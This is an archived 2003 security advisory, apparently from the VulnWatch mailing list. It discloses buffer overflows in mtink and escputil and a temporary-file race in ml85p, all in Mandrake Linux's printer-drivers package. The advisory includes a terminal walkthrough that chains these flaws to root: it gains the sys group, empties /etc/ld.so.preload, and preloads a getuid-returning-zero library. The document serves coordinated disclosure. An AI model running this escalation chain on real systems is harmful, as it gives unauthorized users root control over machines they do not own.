[VulnWatch] iDEFENSE Security Advisory 01.21.03: Buffer Overflows in Mandrake Linux printer-drivers Package

From: iDEFENSE Labs (labs@idefense.com)
Date: 01/21/03

  • Next message: matrix@infowarfare.dk: "[VulnWatch] Directory Traversal vulnerability found in Enceladus Server Suite version 3.9"
    From: "iDEFENSE Labs" <labs@idefense.com>
    To: vulnwatch@vulnwatch.org
    Date: Tue, 21 Jan 2003 13:59:21 -0500

    Hash: SHA1

    iDEFENSE Security Advisory 01.21.03: Buffer Overflows in Mandrake Linux
    printer-drivers Package
    January 21, 2003


    MandrakeSoft Inc.'s Mandrake Linux includes the printer-drivers package in
    most default installations. Specifically, the following three binaries are

    mtink: a status monitor that tracks remaining ink quantity, printing of
    test patterns, and changing and cleaning cartridges, etc. It is maintained
    by Jean-Jacques Sarton (jj.sarton@t-online.de).

    escputil: a utility to clean and align the heads of Epson Stylus printers.
    It also checks current ink levels in the printer. It is maintained by
    Robert Krawitz (rlk@alum.mit.edu) and Mike Sweet.

    ml85p: a Linux driver for Samsung ML-85G series printers. It is maintained
    by Rildo Pragana (rildo@pragana.net).


    Three vulnerabilities exist, the worst of which allows local root
    compromise of a target system.

    VULNERABILITY ONE: The mtink binary, installed set group id (gid) 'sys',
    contains a buffer overflow in its handling of the HOME environment
    variable. Successful exploitation provides an attacker with 'sys' group
    privileges. The following snippet contains the offending segment of code:

    void readRc(int idx)
        FILE *fp;
        char rcPath[1024];

    VULNERABILITY TWO: The escputil binary, installed set gid 'sys',contains a
    buffer overflow in its parsing of the printer-name command line argument.
    Successful exploitation provides an attacker with 'sys' group privileges.

    VULNERABILITY THREE: The ml85p binary, installed set user id root,
    contains a race condition in its opening of temporary files. Successful
    exploitation provides an attacker with the ability to create or empty a
    file with super user privileges. The following snippet contains the
    offending segment of code:

        if (!(cbmf = fopen(gname,"w+"))) {

    An attacker can easily guess the name of a temporary file and then link
    the guessed file to a file at another location. If the other file does not
    exist, it is created world-writeable; if it does exist, the contents of
    the file are lost. ml85p is, by default, installed without execute
    permissions for 'other':

    $ ls -l /usr/bin/ml85p
    - -rwsr-x--- 1 root sys 12344 Sep 17 12:40 /usr/bin/ml85p*

    The binary, however, does provide execute permissions to the 'sys' group,
    whose privileges can be gained using either of the two exploits in
    VULNERABILITY ONE or TWO. Once 'sys' privileges are obtained, an attacker
    can exploit this race condition.

    The following example walks through a sample attack utilizing the
    above-described methods:

    $ id
    uid=501(farmer) gid=501(farmer) groups=501(farmer)

    $ ./escputil_ex
    Usage : ./escputil_ex [offset]
    Address : 0xbffff6b0
    Escputil version 4.2.2, Copyright (C) 2000-2001 Robert Krawitz
    Escputil comes with ABSOLUTELY NO WARRANTY; for details type 'escputil -l'
    This is free software, and you are welcome to redistribute it
    under certain conditions; type 'escputil -l' for details.
    Cleaning heads...
    lpr: unable to print file: client-error-not-found
    /etc/profile.d/alias.sh:31: parse error: condition expected: !=

    $ id
    uid=501(farmer) gid=501(farmer) egid=3(sys) groups=501(farmer)

    $ ls -l /etc/ld.so.preload
    ls: /etc/ld.so.preload: No such file or directory

    $ ./ml85p_ex /etc/ld.so.preload
    Press a key to clean/create /etc/ld.so.preload file
    Wrong file format.
    file position: ffffffff

    $ ls -l /etc/ld.so.preload
    - -rw-rw-rw- 1 root sys 0 Oct 21 09:09 /etc/ld.so.preload

    $ cat > /tmp/lib.c < heredoc> int getuid(void) { return 0; }
    heredoc> EOF

    $ gcc -fPIC -c /tmp/lib.c
    $ gcc -o /tmp/lib.so -shared /tmp/lib.o

    $ echo "/tmp/lib.so" > /etc/ld.so.preload

    $ su -

    # id
    uid=0(root) gid=0(root) groups=0(root)


    Any attacker with local access to a targeted system can launch this
    attack. The ability to empty or create with root privileges any file on
    the file system provides an attacker with many avenues of exploitation.
    The above-described example is just one way of quickly gaining super user
    privileges on a targeted system.


    Mandrake Linux 9.0 is vulnerable. By default, it includes the following
    versions of the printer-drivers package:



    MandrakeSoft has identified the problems and applied author-provided fixes
    to the escputil and mtink vulnerabilities. A patch written by Till
    Kamppeter was applied to ml85p to fix that vulnerability. Updates are
    provided for Mandrake Linux 8.1 through 9.0 for the printer-drivers
    packages, and ghostscript in 8.0 to fix these vulnerabilities


    10/06/2002 Issues disclosed to iDEFENSE
    12/26/2002 Issues disclosed to jj.sarton@t-online.de,
                    rlk@alum.mit.edu, rildo@pragana.net, and
    12/26/2002 Issues disclosed to iDEFENSE clients
    12/26/2002 Vendor responses from rlk@alum.mit.edu,
    12/30/2002 Response from Vincent Danen (vdanen@mandrakesoft.com)
    01/21/2003 Coordinated public disclosure


    Karol Wiesek (appelast@bsquad.sm.pl) discovered these vulnerabilities.

    Get paid for security research

    Subscribe to iDEFENSE Advisories:
    send email to listserv@idefense.com, subject line: "subscribe"

    About iDEFENSE:

    iDEFENSE is a global security intelligence company that proactively
    monitors sources throughout the world from technical
    vulnerabilities and hacker profiling to the global spread of viruses
    and other malicious code. Our security intelligence services provide
    decision-makers, frontline security professionals and network
    administrators with timely access to actionable intelligence
    and decision support on cyber-related threats. For more information,
    visit http://www.idefense.com .

    Version: PGP 8.0
    Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xE4A96E4F

    -----END PGP SIGNATURE-----